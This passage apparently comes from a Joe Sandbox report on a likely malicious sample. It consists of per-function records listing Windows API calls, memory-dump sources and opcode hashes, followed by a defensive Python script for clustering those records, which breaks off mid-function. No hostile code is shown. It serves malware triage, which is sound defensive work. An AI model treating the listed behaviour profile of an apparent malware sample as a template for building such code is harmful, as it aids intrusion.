                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1995159646-0
                                                                                                                                                                    • Opcode ID: 7f4d734e21bc1d9cc2a61685df1eee1a697fa339e57d0f527ec1027dcb9e17f3
                                                                                                                                                                    • Instruction ID: 3bcfdfbf9a02e0331fb41a8b610a78a55fdb48a1deb7d553fc5f6d42d589fd4c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4d734e21bc1d9cc2a61685df1eee1a697fa339e57d0f527ec1027dcb9e17f3
                                                                                                                                                                    • Instruction Fuzzy Hash: 7111D072600204AFEB21CF56DC84FAABBE8EF44324F04846AE945CBA51D774E418CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Timer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                                    • Opcode ID: 180c8562674ee256b471801927d6d7a98daff10609468acbc344479d107cce8e
                                                                                                                                                                    • Instruction ID: 36a51a01f128b7771fae74ab4014c645d8a9339d13079690c10e3812035c0c8d
                                                                                                                                                                    • Opcode Fuzzy Hash: 180c8562674ee256b471801927d6d7a98daff10609468acbc344479d107cce8e
                                                                                                                                                                    • Instruction Fuzzy Hash: F6218C7640D3C09FDB138B21DC94A62FFB0EF17320F0984CAE9C84B563D265A959DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171AE3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction ID: 38e0b324c44f934f59a2df2ec6d7273f45a36bd3829bb945e7411958ee9dcc87
                                                                                                                                                                    • Opcode Fuzzy Hash: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction Fuzzy Hash: A011C172600204AFEB20CF15DC85FAABBE8EF44324F04846AED45DB681D774E558CBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetProcessWorkingSetSize.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171BC7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ProcessSizeWorking
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584180929-0
                                                                                                                                                                    • Opcode ID: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction ID: 6aefc4cf30200a793c5cb46838c44243279d61afc56741f6446bf9df1152425e
                                                                                                                                                                    • Opcode Fuzzy Hash: cff24f816e26c1f55c2e38523203d6fe4ea7c14785655856dba4a7072eb328a0
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D1101B2600204AFEB20CF55CC84FAABBE8EF44324F04846AED04CB642D774E408CBB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FindCloseChangeNotification.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFA3C0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                    • Opcode ID: 434ffe0da7d002936493868a7681174607231487ca550b75a24d99377d5762f7
                                                                                                                                                                    • Instruction ID: 16a6f8ebc4c7dc1239525ebdd851b316a75fcd60aaa192d9ebde1b905205ac67
                                                                                                                                                                    • Opcode Fuzzy Hash: 434ffe0da7d002936493868a7681174607231487ca550b75a24d99377d5762f7
                                                                                                                                                                    • Instruction Fuzzy Hash: 5311B1B55093809FD7128B25DC45B52BFB4EF42220F0984DBED88CB667C239A858CB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 05171A04
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CodeExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3861947596-0
                                                                                                                                                                    • Opcode ID: 4996b355aa80c7b3e09ad5306d151e088747b84c791445ea6be81e2529430a82
                                                                                                                                                                    • Instruction ID: e378d59b516d13821eb1391e1c49c98908a02779e921a798138303aebe196da0
                                                                                                                                                                    • Opcode Fuzzy Hash: 4996b355aa80c7b3e09ad5306d151e088747b84c791445ea6be81e2529430a82
                                                                                                                                                                    • Instruction Fuzzy Hash: C511E371600244AFEB20CB19DC84FAAB7E8EF44224F04846AED05DB642D778E549CAB5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FFA9FA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3793708945-0
                                                                                                                                                                    • Opcode ID: 914457dd861f53440f1c843e6e2485125506fc973fb7730bddc638c0b5867c38
                                                                                                                                                                    • Instruction ID: f956f7665ecb98a00e8f15d0d95501dfa1f3a1f1532fbff1732af54b88f928a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 914457dd861f53440f1c843e6e2485125506fc973fb7730bddc638c0b5867c38
                                                                                                                                                                    • Instruction Fuzzy Hash: AE2184714087809FDB228F61DC44B52FFF4EF46320F0888DAED898B562D275A458DB62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB2DD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                    • Opcode ID: 09d5c502d74d2026c27beb5fe0d1c9a42da5f9733aa8f57e94f74ddd0ea792d3
                                                                                                                                                                    • Instruction ID: fc5c3def5dc5bf4217659c15a13dae0304864ed3b2f72533d16e707f1b432938
                                                                                                                                                                    • Opcode Fuzzy Hash: 09d5c502d74d2026c27beb5fe0d1c9a42da5f9733aa8f57e94f74ddd0ea792d3
• Instruction Fuzzy Hash: 2C110472500204AFEB21CF51DC44FAAFBE8EF44324F04845AEE448B651D374E419DBB5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFAAAC
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 2321b84ba950fbd1c8359337fc0ba393c0f2fae2f816c1637afaee4f3ff75e13
• Instruction ID: 364c4b265c256cc626988d0551fd1f04e6a7fe3522aebb62ac9decc6feb8c626
• Opcode Fuzzy Hash: 2321b84ba950fbd1c8359337fc0ba393c0f2fae2f816c1637afaee4f3ff75e13
• Instruction Fuzzy Hash: F2116D754093C49FDB128B25DC54762BFB4DF47620F0D80DAED848B163D2695908D772
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetComputerNameW.KERNEL32(?,00000E84,?,?), ref: 00FFA4AA
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: d77bcabbd24a3139cc5231d564ddbd9e15e82b3ed143726cd3306e0c8299ae14
• Instruction ID: 64a90efcf8f8ac6d4ebaefc4db4d9f1a27baa3357b7e3503718eb86e38edf62d
• Opcode Fuzzy Hash: d77bcabbd24a3139cc5231d564ddbd9e15e82b3ed143726cd3306e0c8299ae14
• Instruction Fuzzy Hash: E211C4715093846FC311CB26CC45F66FFB4EF86620F08818FE8489BA93D625B919C7A2
Uniqueness

Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 051716FA
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: f8dea1752cfe00841e375263d625bb693f3786674d585922ab869395ea4192b1
• Instruction ID: 802d07bec07ab0d9a877d47f5d7ba5d389cd909c631e69335f1c69bf662a3781
• Opcode Fuzzy Hash: f8dea1752cfe00841e375263d625bb693f3786674d585922ab869395ea4192b1
• Instruction Fuzzy Hash: 7511A5766002449FDB20CF29D885B66FBE8EF44220F08C4AAED49CB741D774E444CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileType.KERNEL32(?,00000E84,ADB2B937,00000000,00000000,00000000,00000000), ref: 00FFB211
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 2f9ea932454a2f8b7ce14c5024d023d91951c30655ea9f9f6a19fc06cca881eb
• Instruction ID: 41eb53f32ffb1cb22f946e5b9fd2b98c5b261e367579afc6ad3d40160f36f57e
• Opcode Fuzzy Hash: 2f9ea932454a2f8b7ce14c5024d023d91951c30655ea9f9f6a19fc06cca881eb
• Instruction Fuzzy Hash: B701D676500204AEE721CB16DC85BBAF7D8DF44724F14C096EE058B752D774E849CAB6
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05171636
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: Connect
• String ID:
• API String ID: 3144859779-0
• Opcode ID: e5866af3de3678b2c741458cb41780e71471b20657755fc78d6f7743bf34548e
• Instruction ID: ce9be1e7d98ed10cf1b0b118e157b77a21ed4a5e23df25ed69e1432c9a20032e
• Opcode Fuzzy Hash: e5866af3de3678b2c741458cb41780e71471b20657755fc78d6f7743bf34548e
• Instruction Fuzzy Hash: 37117C76504204EFDB20CF55D884B66FBF5FF08710F0888AAED898B622D375E458CB66
Uniqueness

Uniqueness Score: -1.00%

APIs
• DispatchMessageW.USER32(?), ref: 00FFBF10
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: DispatchMessage
• String ID:
• API String ID: 2061451462-0
• Opcode ID: 6aafe09f8545671128d52c8518f8da223f6e44ab24e04d29b1bc90ef35c5f7fa
• Instruction ID: 8d40616cdce6439640566f6ebb62fb202139c33aa6fb15977ab406c50ec1ade9
• Opcode Fuzzy Hash: 6aafe09f8545671128d52c8518f8da223f6e44ab24e04d29b1bc90ef35c5f7fa
• Instruction Fuzzy Hash: 8D116575409384AFDB128B15DC44B62FFB4DF46624F0880DAED898F263D275A818DB72
Uniqueness

Uniqueness Score: -1.00%

APIs
• FormatMessageW.KERNEL32(?,00000E84,?,?), ref: 05171CD2
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: FormatMessage
• String ID:
• API String ID: 1306739567-0
• Opcode ID: bfb2d19d3283d5be64c6a6ffcb7c6113c34e6be91abebe1d9cb217a026f40920
• Instruction ID: 6e8d56fb6ae302fc99e8e55668365446221a72970a4646b8e4711eec16437f71
• Opcode Fuzzy Hash: bfb2d19d3283d5be64c6a6ffcb7c6113c34e6be91abebe1d9cb217a026f40920
• Instruction Fuzzy Hash: 6F01B172600204ABD310DF16CC45B76FBA8EBC8A20F14811AEC089BB41D735F925CBE5
Uniqueness

Uniqueness Score: -1.00%

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FFA9FA
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 8c64c848e14f5d8580c0d0e81985c902ab3ffffb2461c5179b08179838d4771c
• Instruction ID: bfc9224e17072344be7afaddf226527aef3cb8e76e23007aefacfdddd2206743
• Opcode Fuzzy Hash: 8c64c848e14f5d8580c0d0e81985c902ab3ffffb2461c5179b08179838d4771c
• Instruction Fuzzy Hash: A401A172900604DFDB218F51D944B62FBE0EF48320F08C45ADE494B625C37AE458EF62
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNEL32(?,00000E84,?,?), ref: 05170712
Memory Dump Source
• Source File: 00000003.00000002.4207927800.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5170000_essam@sasa2023.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: 16a3bf6cb62dbb906ba83de062f980ff8991cea352f11b1add38e8153c095993
• Instruction ID: b26c6bd3eb92271329cdc6ee21915cf1479738f975297b909d1006c4d27312d6
• Opcode Fuzzy Hash: 16a3bf6cb62dbb906ba83de062f980ff8991cea352f11b1add38e8153c095993
• Instruction Fuzzy Hash: A501A272500204ABD310DF16CC46B66FBE4FBC9A20F14811AEC089BB41D771F925CBE6
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFA3C0
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 22ee0f748c1a9197ed81b7e4326244a1aa8d5cd87ed748144ad51ff313ac1dae
• Instruction ID: bc9ab5712888458dcf66b77510b952e08e2df1c236342ec41761b168980f90a8
• Opcode Fuzzy Hash: 22ee0f748c1a9197ed81b7e4326244a1aa8d5cd87ed748144ad51ff313ac1dae
• Instruction Fuzzy Hash: 2301D4B6A00244CFDB10CF25D885766FBD4DF40320F08C4AADE498B766D279E444DAA2
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetComputerNameW.KERNEL32(?,00000E84,?,?), ref: 00FFA4AA
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
Similarity
• API ID: ComputerName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3545744682-0
                                                                                                                                                                    • Opcode ID: 3e49372aeda7f648a625e61f14bd3ed6abe88bc78813c7655ce38b4c337c7cba
                                                                                                                                                                    • Instruction ID: eeb753c3da6601619535f15175ff4d554db0b3e68616f89429e4160433b5779a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e49372aeda7f648a625e61f14bd3ed6abe88bc78813c7655ce38b4c337c7cba
                                                                                                                                                                    • Instruction Fuzzy Hash: 8801A271500204ABD310DF16CC46B66FBE4FBC9A20F148159EC089BB41D735F925CBE6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Timer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2870079774-0
                                                                                                                                                                    • Opcode ID: deb2b5906c8cae6e7d2f7d855a88b3cec99e0d6a5b8dcd84a86a74ceb19d3538
                                                                                                                                                                    • Instruction ID: f9e5cc7f2d0fe8fe04f892994935ce350738367a8b98240f2dbc5f2f98c94330
                                                                                                                                                                    • Opcode Fuzzy Hash: deb2b5906c8cae6e7d2f7d855a88b3cec99e0d6a5b8dcd84a86a74ceb19d3538
                                                                                                                                                                    • Instruction Fuzzy Hash: 4F01A276900244DFDB20CF06D884B65FBE0EF14320F08C09ADE490B662D375E458EBA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00FFBF10
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2061451462-0
                                                                                                                                                                    • Opcode ID: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction ID: aa000198751dc38697153e0b160f1795d9c23e210fb84e6e7d175bf7a982ff62
                                                                                                                                                                    • Opcode Fuzzy Hash: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF08C769042489FDB108F16D884765FBE0EF44324F08C09ADE494B7A2D379E848DEA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetErrorMode.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFAAAC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ffa000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                                    • Opcode ID: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction ID: f9ab2e650f119b019c2f67f4d5c384c510c35c7a839ba0277a44489cefb3b194
                                                                                                                                                                    • Opcode Fuzzy Hash: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0AFB6900248DFDB108F15D984B75FBE0EF44720F08C09ADE494B762E379E848DAA3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 0113284F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198666097.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1130000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                                    • Opcode ID: 38d094cb4e38bdabe11d394b5eabbfa1700ebfb98208f048f19e596660284091
                                                                                                                                                                    • Instruction ID: a80beac4c798a20c7b012bdf5b6ca27589441556f6961d6dbc029f83d3fa7502
                                                                                                                                                                    • Opcode Fuzzy Hash: 38d094cb4e38bdabe11d394b5eabbfa1700ebfb98208f048f19e596660284091
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EF06D70E013459FCB44DF7988446EEBFF2BB8A218B19857ED449E3615EB349906CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 0113284F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198666097.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1130000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                                    • Opcode ID: fe37792443faf3421100db3bfce4b2fc2f76e50f3737c6819b535b62a2b7ca18
                                                                                                                                                                    • Instruction ID: 54065288966ad864a3661e7e9a79b014b668fa133ad4a6bc2bd06f214170b496
                                                                                                                                                                    • Opcode Fuzzy Hash: fe37792443faf3421100db3bfce4b2fc2f76e50f3737c6819b535b62a2b7ca18
                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF01C70E0021A9F8B58EF7AC84959EBFF6AB89214B11853AD409D3344FB349905CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%
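
The blocks above are the raw per-function records of the sandbox's IDA plugin: the API a function references, the memory dump it was carved from (with "based on PE: false" marking regions the sandbox could not map back to an image on disk), and two hashes, an Opcode ID over the opcode sequence alone and an Instruction Fuzzy Hash over the full instructions. The Python below is an added example, not code from Joe Sandbox or from this report. It parses an excerpt transcribed from the records above (constructed input, indentation stripped, unused fields omitted) and pivots on it the way an analyst would: it clusters functions that share an Opcode ID, lists every API reference made from non-PE-backed memory, and ranks Instruction Fuzzy Hashes by similarity. The similarity score is a positional nibble-agreement stand-in, since the page does not describe the vendor's own algorithm; reading the first dot-separated field of the dump name as a process index is likewise an assumption, while the fourth field being the region base is borne out by its matching the reported Offset in every record on the page.

```python
"""Pivot on the per-function blocks of a Joe Sandbox IDA-plugin listing.
Added example, not code from Joe Sandbox or from this report."""
import re
from collections import defaultdict

# Constructed input: four blocks transcribed from the listing above, with the
# indentation removed and the fields this script does not use left out.
REPORT_EXCERPT = """\
APIs
• GetComputerNameW.KERNEL32(?,00000E84,?,?), ref: 00FFA4AA
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
• API ID: ComputerName
• Opcode ID: 3e49372aeda7f648a625e61f14bd3ed6abe88bc78813c7655ce38b4c337c7cba
• Instruction Fuzzy Hash: 8801A271500204ABD310DF16CC46B66FBE4FBC9A20F148159EC089BB41D735F925CBE6
APIs
• DispatchMessageW.USER32(?), ref: 00FFBF10
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
• API ID: DispatchMessage
• Opcode ID: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
• Instruction Fuzzy Hash: 8EF08C769042489FDB108F16D884765FBE0EF44324F08C09ADE494B7A2D379E848DEA2
APIs
• SetErrorMode.KERNEL32(?,ADB2B937,00000000,?,?,?,?,?,?,?,?,6C0F3C58), ref: 00FFAAAC
Memory Dump Source
• Source File: 00000003.00000002.4194911883.0000000000FFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFA000, based on PE: false
• API ID: ErrorMode
• Opcode ID: eef9aef46a70d9745c22d0ea27c91de04f565c1f13411b8d20f657968abfa239
• Instruction Fuzzy Hash: 2AF0AFB6900248DFDB108F15D984B75FBE0EF44720F08C09ADE494B762E379E848DAA3
APIs
• KiUserExceptionDispatcher.NTDLL ref: 0113284F
Memory Dump Source
• Source File: 00000003.00000002.4198666097.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
• API ID: DispatcherExceptionUser
• Opcode ID: 38d094cb4e38bdabe11d394b5eabbfa1700ebfb98208f048f19e596660284091
• Instruction Fuzzy Hash: 8EF06D70E013459FCB44DF7988446EEBFF2BB8A218B19857ED449E3615EB349906CBA0
"""

API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<module>\w+)(?:\(.*\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), "
                    r"based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")
HEADERS = ("APIs", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin")

def parse_blocks(text):
    """One dict per function block. A block starts at 'APIs' (or at 'Memory Dump
    Source' when the function references no API) and ends at its 'Instruction
    Fuzzy Hash' line, the last field the plugin prints before 'Uniqueness'."""
    blocks, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if line == "APIs" or (line == "Memory Dump Source" and cur is None):
            cur = {"apis": []}
        if cur is None or line in HEADERS:
            continue
        if m := API_RE.match(line):
            cur["apis"].append((m["api"], m["module"], int(m["ref"], 16)))
        elif m := SRC_RE.match(line):
            fields = m["dump"].split(".")
            cur["dump"] = m["dump"]
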